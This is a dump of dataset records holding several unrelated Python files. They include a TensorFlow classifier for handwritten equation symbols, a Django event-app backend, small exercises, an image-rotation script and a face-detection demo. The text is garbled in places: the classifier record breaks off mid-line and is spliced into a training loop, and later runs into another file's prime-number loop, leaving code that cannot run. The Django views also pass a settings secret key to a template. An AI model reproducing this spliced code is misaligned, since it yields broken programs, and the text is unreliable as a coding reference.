+{"seq_id":"418195838","text":"from __future__ import division\nfrom __future__ import print_function\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 25 17:06:17 2017\n\n@author: paulcabrera\n\nRUN:\n$ source ~/tensorflow/bin/activate\n$ python 5-4-17.py ./annotate/\n\"\"\"\n\n\"\"\"\nComments:\n \n \n - We're allowed to submit our model to TAs before the deadline so they can run it and let us know the results.\n \n - maybe try to make some predictions on the examples folder\n \n - More training and test data? MNIST?\n http://www.ee.surrey.ac.uk/CVSSP/demos/chars74k/: may have to invert colors and delete folders for symbols that\n don't appear. \n - An issue with using MNIST is it has more digits than necessary. We just need 0, 1, 2, 3, 4, 6. 
So maybe filter the\n other digits out\n - equations.pdf:\n - Other symbols: =, +, -, division sign, bar division sign, (, ), pi, sqrt, delta, ..., +- sign\n - Having trouble finding data for the above symbols.\n - letters: x, y, a, b, c, m, n, d, p, k, f, s, i, o, t, A\n \n - We may not have enough data for the more complicated neural network to work properly.\n \n - Perhaps reducing the number of layers would lead to better results\n \n - I increased the batch size to train the model properly given the more complex neural network\n \n - Consider using TA's input_wrapper instead of the various functions I use to transform the image.\n \n - predictions.txt results are far more inaccurate currently using the more complex neural network compared to the simple one\n\"\"\"\n\nimport sys\nimport glob\nfrom PIL import Image, ImageFilter\nimport skimage.measure as skm\nimport scipy.misc as scm\nimport numpy as np\nimport skimage.morphology as morphology\nimport tensorflow as tf\nfrom skimage.transform import resize,warp,AffineTransform\n\ntrainpath = sys.argv[-1] # # path for the folder containg the training images i.e. 
the path for 'annotated'\ntf.reset_default_graph() # http://stackoverflow.com/questions/41400391/tensorflow-saving-and-resoring-session-multiple-variables\n\nclass SymPred():\n\t# prediction is a string; the other args are ints\n\tdef __init__(self,prediction, x1, y1, x2, y2):\n\t\t\"\"\"\n\t\t is the top-left and bottom-right coordinates for the bounding box\n\t\t(x1,y1)\n\t\t\t .--------\n\t\t\t |\t\t|\n\t\t\t |\t\t|\n\t\t\t\t--------.\n\t\t\t\t\t\t (x2,y2)\n\t\t\"\"\"\n\t\tself.prediction = prediction \n\t\tself.x1 = x1\n\t\tself.y1 = y1\n\t\tself.x2 = x2\n\t\tself.y2 = y2\n\tdef __str__(self):\n\t\treturn self.prediction + '\\t' + '\\t'.join([\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.x1),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.y1),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.x2),\n\t\t\t\t\t\t\t\t\t\t\t\tstr(self.y2)])\n\ndef padim(im):\n\t\"\"\" Pads image to make it into a square.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be padded.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im with padding.\n\t\"\"\"\n\trows = len(im)\n\tcols = len(im[0])\n\tzeros = max(rows, cols) - min(rows, cols)\n\tleft, right, top, bottom = 0, 0, 0, 0\n\tif rows > cols:\n\t\tleft = zeros//2\n\t\tright = zeros - left\n\telif rows < cols:\n\t\ttop = zeros//2\n\t\tbottom = zeros - top\n\treturn np.pad(im, ((top, bottom), (left, right)), 'constant')\n\ndef fullpadim(im):\n\t\"\"\" Pads left, right, bottom, and top with zeros and then do additional padding to make image into a square.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be padded.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im with padding.\n\t\"\"\"\n\trows = len(im)\n\tcols = len(im[0])\n\tzeros = max(rows, cols) - min(rows, cols)\n\tleft = zeros//2\n\tright = zeros - left\n\tleft = right\n\tbottom = zeros//2\n\ttop = zeros - bottom\n\tbottom = top\n\tim = np.pad(im, ((top, bottom), (left, right)), 'constant')\n\tif len(im) != len(im[0]):\n\t\tim = padim(im)\n\treturn im\n\ndef 
cropim(im):\n\t\"\"\" Returns image that has been cropped using a bounding box.\n\t\n\tReference: http://chayanvinayak.blogspot.com/2013/03/bounding-box-in-pilpython-image-library.html\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tAn image to be cropped.\n\t\n\tReturns\n\t-------\n\tndarray\n\t\tA copy of im cropped using bound box obtained from ???\n\t\"\"\"\n\tim = Image.fromarray(im)\n\tz = im.split()\n\tleft,upper,right,lower = z[0].getbbox() \n\t#im = (im.crop((left,upper,right,lower))).filter(ImageFilter.SHARPEN) # filter doesn't work for some reason \n\tim = (im.crop((left,upper,right,lower)))\n\treturn np.array(im.getdata()).reshape((im.size[1], im.size[0])) # confirmed it's im.size[1] and im.size[0] in that order\n\t\ndef normalize(im):\n\t\"\"\" Normalize ndarray to values between 0 and 1\n\t\n\tParameters\n\t----------\n\timg : ndarray\n\t\tImage data to be normalized.\n\t\t\n\tReturns\n\t-------\n\tndarray\n\t\tA normalized copy of im.\n\t\"\"\"\n\treturn im / im.max() # MNIST data says 0 means white and 255 means black. MNIST images are normalized between 0 and 1. \n\t\ndef newim(im):\n\t\"\"\" Returns a normalized and padded square 28x28 pixel copy of an equation component.\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tImage data.\n\t\n\tReturns\n\t-------\n\tndarray\n\t\tA normalized, padded, square copy of im.\n\t\n\t\"\"\"\n\treturn normalize(fullpadim(im))\n\ndef connectedcomps(im):\n\t\"\"\" Returns a list of connected components as ndarrays that have more than 50 pixels\n\t\n\tParameters\n\t----------\n\tim : ndarray\n\t\tImage of an equation.\n\t\t\n\tReturns\n\t-------\n\t(ndarray, ndarray)\t\n\t\tA kist of the equation's components and a list of corresponding bounding box coordinates.\n\t\"\"\"\n\tcomps = skm.regionprops(skm.label(im > 0)) # im > 0 leads to all values greater than 0 becoming True i.e. 1 and all equal to 0 False i.e. 
0\n\t# I am not entirely sure if im > 0 is necessary since I omit components with fewer than 50 pixels in the code below\n\t# Without the if condition and without im > 0, however, we get an unreasonably high number of components, most of which are useless\n\tbbcoords = []\n\tnewcomps = []\n\tfor i in range(len(comps)):\n\t\tif comps[i].area < 50:\n\t\t\tcontinue\n\t\tbbcoords += [comps[i].bbox]\n\t\tnewcomps += [normalize(morphology.dilation(\n\t\t\t\t\t\t\t scm.imresize(\n\t\t\t\t\t\t\t\t\tfullpadim(cropim(np.asarray(comps[i].image, dtype=np.float32))), \n\t\t\t\t\t\t\t\t\t(32, 32), 'bicubic')))]\n\treturn (newcomps, bbcoords)\t \n\ndef getlocalpath(path):\n\t\"\"\" Returns the last value of a filepath.\n\t\n\tParameters\n\t----------\n\tpath : string\n\t\tA complete image file path.\t Ex: 'path/to/a/file.png'\n\t\n\tReturns\n\t-------\n\tstring\n\t\tThe containing directory of path.\n\t\"\"\"\n\treturn path.split('/')[-1]\n\ndef geteqnpath(path):\n\t\"\"\" Given the full path for a symbol, return the path of the corresponding equation.\n\t\n\tParameters\n\t----------\n\tpath : string\n\t\tA complete image component file path. Ex: '$home/annotated/SKMBT_36317040717260_eq2_sqrt_22_98_678_797.png'\n\t\t\n\tReturns\n\t-------\n\tstring\n\t\tPath of the corresponding equation image. 
Ex: '$home/annotated/SKMBT_36317040717260_eq2.png'\t\t\n\t\"\"\"\n\ts = \"\"\n\tcount = 0 # keeps track of number of underscores encountered\n\tfor c in path:\n\t\tif c == '_':\n\t\t\tcount += 1\n\t\tif count == 3:\n\t\t\tbreak\n\t\ts += c\n\tif '.png' in s:\n\t\treturn s\n\treturn s + '.png'\n\t\t\n\ndef getdict(folder):\n\t\"\"\" Returns a dictionary where the key is the equation image path and the value is a list of paths for the symbols of the equation.\n\t\n\tParameters\n\t----------\n\tfolder : string\n\t\tThe full path of the folder containing the annotated images.\n\t\n\tReturns\n\t-------\n\tdict(string, list(string))\n\t\tA dictionary of image paths keys and component path list values.\n\t\"\"\"\n\tpaths = glob.glob(folder+'/*.png')\n\teqns = {}\n\td = {}\n\tiseqn = False\n\ti = -5\n\ts = ''\n\tfor p in paths:\n\t\tc = p[i] # p[-5], which is the character right before the .png\n\t\t# use this loop to see if 'eq' occurs before the first instance of '_' when going in reverse order\n\t\twhile c != '_' and (not iseqn) and abs(i) <= len(p): \n\t\t\ts += c\n\t\t\tif 'eq' in s[::-1]: # reverse of s since s is being built up in reverse\n\t\t\t\tiseqn = True\n\t\t\ti -= 1\n\t\t\tif abs(i) <= len(p):\n\t\t\t\tc = p[i]\n\t\tif iseqn: \n\t\t\teqns[p] = []\n\t\telse: # path is for an image of a symbol, not equation\n\t\t\teqnpath = geteqnpath(p)\n\t\t\tif eqnpath in eqns: # otherwise: FileNotFoundError\n\t\t\t\tif eqnpath not in d:\n\t\t\t\t\td[eqnpath] = []\n\t\t\t\td[eqnpath] += [p]\n\t\ts = ''\n\t\tiseqn = False\n\t\ti = -5\n\treturn d\n\t\ndef getsypaths(folder):\n\td = getdict(folder)\n\tlst = list(d.values())\n\tsypaths = []\n\tfor e in lst:\n\t\tif e:\t# not the empty list\n\t\t\tsypaths += e\n\treturn sypaths\n\ndef geteqpaths(folder):\n\td = getdict(folder)\n\treturn list(d.keys())\n\n ### CHANGED: Using a (32, 32) image now and I moved the np.resize function elsewhere ###\ndef transform(im):\n\treturn normalize(morphology.dilation(scm.imresize(fullpadim(im), 
(32, 32), 'bicubic')))\n \ndef geteqims(folder):\n\treturn [(scm.imread(impath), impath) for impath in geteqpaths(folder)]\n\t\t \n# Get the images of the symbols. These will be used as training data\n# list of tuples: (ndarray length 28*28 of image, imagepath)\ndef getsyims(folder):\n\treturn [(transform(scm.imread(impath)), impath) for impath in getsypaths(folder)]\n\t\t\t\n# given the path for a symbol in the format of images in annotated, extract the label\ndef getlabel(path):\n\t# once you get to the 4th underscore as you move backwards through the path, build the string until you reach the 5th underscore\n\tcount = 0 # count of underscores\n\tlabel = ''\n\ti = -1\n\twhile count < 5 and abs(i) <= len(path):\n\t\tif path[i] == '_':\n\t\t\tcount += 1\n\t\telif count == 4: # assuming '_' is not a valid symbol\n\t\t\tlabel += path[i]\n\t\ti -= 1\n\treturn label[::-1] # reverse\n\t\n# Add the corresponding label to each tuple for the argument trainims, which is the result of getsyims(trainpath)\ndef addlabel(trainims):\n\t\"\"\" Add the corresponding label to each tuple for the argument trainims, which is the result of getsyims(trainpath).\n\t\n\tParameters\n\t----------\n\ttrainims : *** type ***\n\t\t*** Description of trainims ***\n\t\n\tReturns\n\t-------\n\t*** return type ***\n\t\t*** Description of return type ***\n\t\"\"\"\n\treturn [(im, impath, getlabel(impath)) for (im, impath) in trainims]\n\t\ndef unpack(syims):\n\t\"\"\" *** Description here ***\n\t\n\tParameters\n\t----------\n\tsyims : ** type **\n\t\t** Description here. 
**\n\t\n\tReturns\n\t-------\n\t(array.**type**, array.**type**, array.**type**)\n\t\tims - \n\t\tpaths -\n\t\tlabels -\n\t\"\"\"\n\tims, paths, labels = [], [], []\n\tfor e in syims:\n\t\tims += [e[0]]\n\t\tpaths += [e[1]]\n\t\tlabels += [e[2]]\n\t#return (np.asarray(ims), np.asarray(paths), np.asarray(labels)) # currently seems unnecessary based on what I'm doing in my_next_batch\n\treturn (ims, paths, labels)\t\t \n\n# args: lst - sorted list of unique labels e.g. labellst = list(set(labels)).sorted()\n# returns dictionary of onehot lists for each label\ndef oneHot(lst):\n\t\"\"\" *** Description ***\n\t\n\tParameters\n\t----------\n\tlst : list\n\t\tSorted list of unique labels. e.g. labellst = list(set(labels)).sorted()\n\t\t\n\tReturns\n\t-------\n\tdict.***type***\n\t\tDictionary of onehot lists for each label.\n\t\"\"\"\n\td = {}\t\n\tn = len(lst)\n\tonehotlst = [0]*n # list of zeros of length len(lst)\n\ti = 0\n\tfor label in lst:\n\t\tonehotlst[i] = 1\n\t\td[label] = onehotlst\n\t\tonehotlst = [0]*n\n\t\ti += 1\n\treturn d\n\t\n# return an ndarray of one-hot lists for every element. INCOMPLETE\ndef oneHotTotal(lst):\n\t\"\"\" Return an ndarray of one-hot lists for every element. 
INCOMPLETE\n\t\n\tParameters\n\t----------\n\tlst : list\n\t\tList of component labels.\n\t\n\tReturns\n\t-------\n\tarray.list.\n\t\tArray of one-hot lists.\n\t\"\"\"\n\tarr = np.asarray(oneHot(lst[0]))\n\tfor i in range(1, len(lst)):\n\t\tarr = np.vstack((arr, oneHot(lst[i])))\n\treturn arr\n\nsyims = addlabel(getsyims(trainpath)) # symbol (not equation) images; result is list of 3-element tuples: \n\n(trainims, trainpaths, labels) = unpack(syims)\nlabellst = list(set(labels)) \nlabellst.sort() # sorted list of unique labels\nonehotdict = oneHot(labellst)\n\n\t\n# affine transformation\ndef image_deformation(image):\n random_shear_angl = np.random.random() * np.pi/6 - np.pi/12\n random_rot_angl = np.random.random() * np.pi/6 - np.pi/12 - random_shear_angl\n random_x_scale = np.random.random() * .4 + .8\n random_y_scale = np.random.random() * .4 + .8\n random_x_trans = np.random.random() * image.shape[0] / 4 - image.shape[0] / 8\n random_y_trans = np.random.random() * image.shape[1] / 4 - image.shape[1] / 8\n dx = image.shape[0]/2. \\\n - random_x_scale * image.shape[0]/2 * np.cos(random_rot_angl)\\\n + random_y_scale * image.shape[1]/2 * np.sin(random_rot_angl + random_shear_angl)\n dy = image.shape[1]/2. 
\\\n - random_x_scale * image.shape[0]/2 * np.sin(random_rot_angl)\\\n - random_y_scale * image.shape[1]/2 * np.cos(random_rot_angl + random_shear_angl)\n trans_mat = AffineTransform(rotation=random_rot_angl,\n translation=(dx + random_x_trans,\n dy + random_y_trans),\n shear = random_shear_angl,\n scale = (random_x_scale,random_y_scale))\n return warp(image,trans_mat.inverse,output_shape=image.shape)\n \n# uses variables defined outside of this function: trainims, trainpaths, labellst\n### CHANGED ###\ndef my_next_batch(batch_size=10):\n\t\"\"\" *** Description ***\n\t\t\n\tParameters\n\t----------\n\ttrainims : ** type **\n\t\t*** Description of trainims ***\n\t\n\tReturns\n\t-------\n\t(array, array, array)\n\t\tbatch_x - numpy pixel arrays for each symbol\n\t\tbatch_y - one hot tensors for each symbol\n\t\tbatch_z - image path for the symbol's associate equation\n\t\"\"\"\n\t# randomly pick ten elements from trainims\n\tsize = len(trainims)\n\tindices = [np.random.randint(0, size) for j in range(batch_size)]\n\tnumlabels = len(labellst)\n\tbatch_x = np.zeros((batch_size, 32*32))\n\tbatch_y = np.zeros((batch_size, numlabels)) # rows = batch_size and cols = # of unique symbols\n\tbatch_z = np.empty((batch_size, 1), dtype='= 1e-6:\n learn_rate /= 2.\n phist = train_accuracy\t\n\ttrain_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 1., l_rate: learn_rate}) # changed keep_prob to 1.\n\t\nsave_path = saver.save(sess, 'my-model2') \nprint ('Model saved in file: ', save_path) \n\neqims = geteqims(trainpath) # tuple: (ndarray, path) for images of equations\n#ims comps is a list of 2-element tuples: ((list of ndarrays for components, list of corresponding bounding box coordinates), equationpath)\nimscomps = [(connectedcomps(i[0]), i[1]) for i in eqims] # \n\n# uses variables defined outside function: imscomps\ndef formatcomps():\n\ttestdata = [] \n\tfor eq in imscomps: # components and path for a particular equation\n\t\t# eq[0] is a tuple: (list of ndarrays 
for components, list of corresponding bounding box coordinates)\n\t\tnumcomps = len(eq[0][0])\n\t\tfor i in range(len(eq[0][0])):\n\t\t\ttestdata += [(np.resize(eq[0][0][i], 32*32), eq[0][1][i], eq[1], numcomps)]\n\treturn testdata \n\ntestdata = formatcomps()\n\ndef structuretestdata(): \n\t\"\"\" ** Description of method ***\n\t\n\tReturns\n\t-------\n\t(array, array, array)\n\t\tx - 28x28 tensor for image pixels (one single component)\n\t\ty - bounding box coordinates for x (in equation)\n\t\tz - holds the image path for the original equation\n\t\tnum - number of components for the equation in z\n\t\"\"\"\n\tsize = len(testdata)\n\tx = np.zeros((size, 32*32), dtype=np.float32) # important to specify dtype=np.float32, otherwise UnicodeDecodeError\n\ty = np.empty((size, 4), dtype=np.int32) # holds bounding box coordinates\n\tz = np.empty((size, 1), dtype=' math.sqrt(n): break\n\t\telif n % p == 0:\n\t\t\tprime = False\n\t\t\tbreak\n\tif prime: primes.append(n)\n\tn += 2\n\nprint('Answer:', primes[10000])\n","sub_path":"007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"620824093","text":"from django.conf.urls import url\nfrom django.contrib import admin\n\nfrom index import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^sql/$', views.sql_view, name='sql_view'),\n url(r'^sql_insert/$', views.sql_insert, name='sql_insert'),\n url(r'^table/$', views.table_view, name='table_view'),\n url(r'^table/(?P.+)$', views.table_view, name='table_view'),\n url(r'^init/$', views.init_db, name='init_db'),\n]\n","sub_path":"index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"377311903","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 
01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/pierre/workspace/django-survey/survey/tests/exporter/tex/test_question2tex_sankey.py\n# Compiled at: 2020-02-25 02:49:28\n# Size of source mod 2**32: 1192 bytes\nfrom survey.exporter.tex.question2tex_sankey import Question2TexSankey\nfrom survey.tests.management.test_management import TestManagement\n\nclass TestQuestion2TexSankey(TestManagement):\n\n def test_other_question_type(self):\n \"\"\" We get a type error if we do not give a Question. \"\"\"\n question = self.survey.questions.get(text='Aèbc?')\n self.assertRaises(TypeError, Question2TexSankey.__init__, question, {'other_question': 'other_question'})\n other_question = self.survey.questions.get(text='Aèbc?')\n q2s = Question2TexSankey(question, other_question=other_question)\n self.assertIsNotNone(q2s.tex())","sub_path":"pycfiles/django_survey_and_report-1.3.21-py3-none-any/test_question2tex_sankey.cpython-37.py","file_name":"test_question2tex_sankey.cpython-37.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"362065137","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nn= int(input())\na = set(map(int, input().split()))\nN = int(input())\nfor i in range(N):\n str_ = input().split()\n cmd = str_[0]\n b = set(map(int, input().split()))\n if(cmd == \"update\"):\n a.update(b)\n elif(cmd == \"intersection_update\"):\n a.intersection_update(b)\n elif(cmd == \"difference_update\"):\n a.difference_update(b)\n elif(cmd == \"symmetric_difference_update\"):\n a.symmetric_difference_update(b)\nprint(sum(a))\n","sub_path":"HackerRank-Python Practice/04. Set/010. Set Mutations.py","file_name":"010. 
Set Mutations.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653568726","text":"import cv2\r\nimport numpy as np\r\nimport math\r\nimg = cv2.imread('picture.jpg')#读取原图像,左上为原点\r\nrows = img.shape[0] #取图片的行数,即高度\r\ncols = img.shape[1] #取图片的列数,即宽度\r\nprint(\"图像的高度:\",rows,\"图像的宽度:\",cols)\r\ncenter_x=int(input(\"请输入旋转中心x:(请在图像的宽度范围内输入):\"))\r\ncenter_y=int(input(\"请输入旋转中心y:(请在图像的宽度范围内输入):\"))\r\ncenter=[center_x,center_y] #设置图片中心\r\nresult=np.zeros((rows,cols,3),dtype=np.uint8) #创建一样大小的转换结果\r\nbeta=int(input(\"请输入旋转角度:\"))*math.pi/180\r\ntransform=np.array([[math.cos(beta),-math.sin(beta),0],\r\n [math.sin(beta), math.cos(beta),0],\r\n [0,0,1]]) #转换矩阵\r\ncv2.imshow('original_picture',img)#显示原图片\r\nfor i in range(rows):\r\n for j in range(cols):\r\n img_pos=np.array([i-center[0],j-center[1],1]) #记录结果位置\r\n [x, y, z] = np.dot(transform, img_pos) #转换为原图位置坐标\r\n x = int(x)+center[0] #取整\r\n y = int(y)+center[1] #取整\r\n if x >= rows or y >= cols or x < 0 or y < 0: #如果出界\r\n result[i][j] = 255 #该点为白色\r\n else:\r\n result[i][j] = img[x][y] #不出界把原图位置对应值取来\r\ncv2.imshow('result_process', result) #显示结果\r\ncv2.waitKey(0) #按任意键继续\r\n","sub_path":"homework01/code/lianxi02_ImageRotation_2.py","file_name":"lianxi02_ImageRotation_2.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"262023001","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom .models import * # import ALL models\nfrom django.contrib import messages # validation\nimport bcrypt # password encryption\nfrom django.conf import settings # map settings\nfrom datetime import datetime # events/activities date -time\n\n\ndef index(request):\n request.session.flush()\n return render(request, 'index.html')\n\ndef logout(request):\n request.session.flush()\n messages.success(request, 'You have logged out 
successfully!')\n return redirect('/ABC')\n\ndef login(request):\n if request.method == 'POST':\n print(request.POST) # should see QueryDict\n\n errors = User.objects.login_validator(request.POST)\n print(errors)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n\n return render(request, 'partialMsgs.html') # AJAX!!!\n # return redirect('/ABC') #redirect the user back to the form to fix the errors\n else:\n\n this_user = User.objects.get(email=request.POST['email'])\n request.session['user_id'] = this_user.id\n # messages.success(request, \"You have successfully logged in!\")\n return redirect('/ABC/myEvents')\n\n\ndef regForm(request):\n return render(request, 'regForm.html')\n\n\ndef register(request):\n if request.method == 'POST':\n print(request.POST) # should see QueryDict\n\n errors = User.objects.reg_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return render(request, 'partialMsgs.html') # AJAX!!!\n # return redirect('/ABC/regForm') #redirect the user back to the form to fix the errors\n else:\n hashed_pw = bcrypt.hashpw(\n request.POST['password'].encode(), bcrypt.gensalt()).decode()\n new_user = User.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n email=request.POST['email'],\n password=hashed_pw)\n request.session['user_id'] = new_user.id\n # messages.success(request, \"You have successfully registered!\")\n return redirect('/ABC/dashboard')\n\n\ndef childForm(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n\n user = User.objects.get(id=request.session['user_id'])\n context = {\n 'user': user,\n }\n return render(request, 'childForm.html', context)\n\n\ndef regChild(request):\n if request.method == \"POST\":\n\n errors = Child.objects.child_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return 
redirect('/ABC/childForm') # redirect the user back to the form to fix the errors\n\n else:\n user = User.objects.get(id=request.session['user_id'])\n\n Child.objects.create(\n first_name=request.POST['first_name'],\n last_name=request.POST['last_name'],\n birth_date=request.POST['birth_date'],\n gender=request.POST['child_gender'],\n age=request.POST['child_age'],\n program=request.POST['child_program'],\n parent_child=user,\n )\n\n # when successful Register a Child is click redirect back to myProfile\n return redirect('/ABC/myProfile')\n\n\ndef myProfile(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n context = {\n 'user': user,\n 'children': children,\n }\n return render(request, 'myProfile.html', context)\n\n\ndef update_myProfile(request):\n if request.method == \"POST\":\n errors = User.objects.password_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/ABC/myProfile')\n else:\n hashed_pw = bcrypt.hashpw(\n request.POST['password'].encode(), bcrypt.gensalt()).decode()\n user = User.objects.get(id=request.session['user_id'])\n user.password = hashed_pw\n user.save()\n return redirect('/ABC/dashboard')\n\n\ndef remove_child_myProfile(request):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n else:\n if request.method == \"POST\":\n child = Child.objects.get(id=request.POST['child_id'])\n child.delete()\n return redirect('/ABC/myProfile')\n else:\n return redirect('/ABC')\n\ndef remove_event_myEvents(request):\n # if 'event_id' not in request.session:\n # return redirect('/ABC/myEvents')\n # else:\n if request.method == \"POST\":\n event= Event.objects.get(id=request.POST['event_id'])\n event.delete()\n return redirect('/ABC/myEvents')\n else:\n return redirect('/ABC')\n\ndef myEvents(request):\n if 'user_id' not in request.session:\n 
return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n past_events=Event.objects.filter(event_date__lte = datetime.today(), user_event = User.objects.get(id=request.session['user_id']) )\n future_events=Event.objects.filter(event_date__gte = datetime.today(), user_event = User.objects.get(id=request.session['user_id']) )\n child=Child.objects.filter(parent_child=user)\n context = {\n 'user': user,\n 'past_events': past_events,\n 'future_events':future_events,\n 'child': child,\n }\n return render(request, 'myEvents.html', context)\n\n\ndef dashboard(request):\n if 'user_id' not in request.session:\n messages.error(request, \"Need to register or login buddy!\")\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n events = Event.objects.filter(event_date__gte = datetime.today())\n\n context = {\n 'user': user,\n 'events': events,\n # 'total_num': total_num,\n }\n return render(request, 'dashboard.html', context)\n\n\ndef viewJoin(request, event_id):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n event = Event.objects.get(id=event_id)\n context = {\n 'user': user,\n 'children': children,\n 'user_event': event,\n }\n return render(request, 'newJoin.html', context)\n\n\ndef requestJoin(request, event_id):\n if 'user_id' not in request.session:\n return redirect('/ABC')\n else:\n if request.method == \"POST\":\n user = User.objects.get(id=request.session['user_id'])\n children = user.enrolled_parent.all()\n event = Event.objects.get(id=event_id)\n check_boxes = request.POST.getlist('childrenJoin', [])\n for checkbox_result in check_boxes:\n selected_child = Child.objects.get(\n id=checkbox_result)\n event.child_event.add(selected_child)\n print(checkbox_result)\n event.save()\n return redirect('/ABC/myEvents')\n else:\n return redirect('/ABC/{event_id}/newJoin')\n\n\n\ndef confirmJoin(request, 
event_id):\n this_event = Event.objects.filter(id=event_id) #d_id comes from the urls.py parm. FILTER is SO important here -do not use GET! \n if len(this_event) != 1:\n return redirect('/ABC/dashboard')\n user = User.objects.get(id=request.session['user_id'])\n context = {\n 'one_event': this_event[0], #need this because it is a list. grab \"value\" to initially populate record for the update/view\n 'user': user,\n 'api_key': settings.SECRET_KEY2, #if inspect -unfortunately you can still see the key!\n 'messages_list': this_event[0].eventmessages_join.all().order_by(\"-created_at\"), #only messages for this SPECIFIC event\n }\n return render(request, 'confirmJoin.html', context) \n\n\ndef create_msg(request, event_id):\n errors = Message.objects.msg_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n else: \n if request.method == \"POST\":\n this_event = Event.objects.filter(id=event_id) \n Message.objects.create(\n msg_content=request.POST['msg_content'],\n msg_UsrJoin=User.objects.get(id=request.session['user_id']), #comes from the login \n msg_EventJoin=this_event[0], \n )\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef create_comment(request, event_id, msg_id):\n errors = Comment.objects.comm_validator(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value) \n else: \n if request.method == \"POST\": \n this_msg = Message.objects.get(id=msg_id)\n Comment.objects.create(com_content=request.POST['com_content'],\n com_UserJoin=User.objects.get(id=request.session['user_id']), #c#comes from the login \n msg_CommJoin=this_msg, #join the comment with the message\n ) \n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef delete_comment(request, event_id, comm_id):\n this_comm = Comment.objects.get(id=comm_id)\n this_Logged_user = User.objects.get(id=request.session['user_id'])\n\n if this_comm.com_UserJoin == this_Logged_user: #only owner of comment can 
delete OR in html -just show \"delete\" to owner. \n this_comm.delete() \n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef add_like(request, event_id, msg_id):\n liked_message = Message.objects.get(id=msg_id)\n user_liking = User.objects.get(id=request.session['user_id'])\n liked_message.user_likes.add(user_liking)\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\ndef remove_like(request, event_id, msg_id):\n liked_message = Message.objects.get(id=msg_id)\n user_liking = User.objects.get(id=request.session['user_id'])\n liked_message.user_likes.remove(user_liking)\n return redirect(f'/ABC/{event_id}/confirmJoin')\n\n\n\n","sub_path":"group_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"621244945","text":"#!/usr/bin/python\nfrom pycam import VideoCapturePlayer\nfrom pycam import pygameFaceDetect\nfrom pycam.filters import outlineEdges\n\ndef process(surf):\n faces = pygameFaceDetect.getFaces(surf)\n surf = outlineEdges(surf)\n if faces:\n pygameFaceDetect.drawFacesOnSurface(surf, faces)\n return surf\n\nif __name__ == \"__main__\":\n vcp = VideoCapturePlayer(processFunction=process)\n vcp.main()\n pygame.quit()\n \n","sub_path":"pycam/examples/opencv/FaceAndEdgeDetect.py","file_name":"FaceAndEdgeDetect.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358062976","text":"# -*- coding: utf-8 -*-\n\n# MIT License\n#\n# Copyright (c) 2018 Tijme Gommers\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the 
